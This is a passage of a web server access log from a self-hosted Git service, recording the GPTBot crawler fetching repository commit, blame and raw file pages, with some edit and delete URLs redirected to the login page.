+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10939] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 11256] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:16:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10436] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10608] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10581] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10602] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup" [Client 74.7.227.38] [Length 10003] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:16:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10288] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9904] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:16:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:16:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 14497] [Gzip 8.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:16:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:13:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15176] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15176] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 14464] [Gzip 8.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:16:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 10304] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21645] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16830] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16829] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10237] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21645] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10235] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 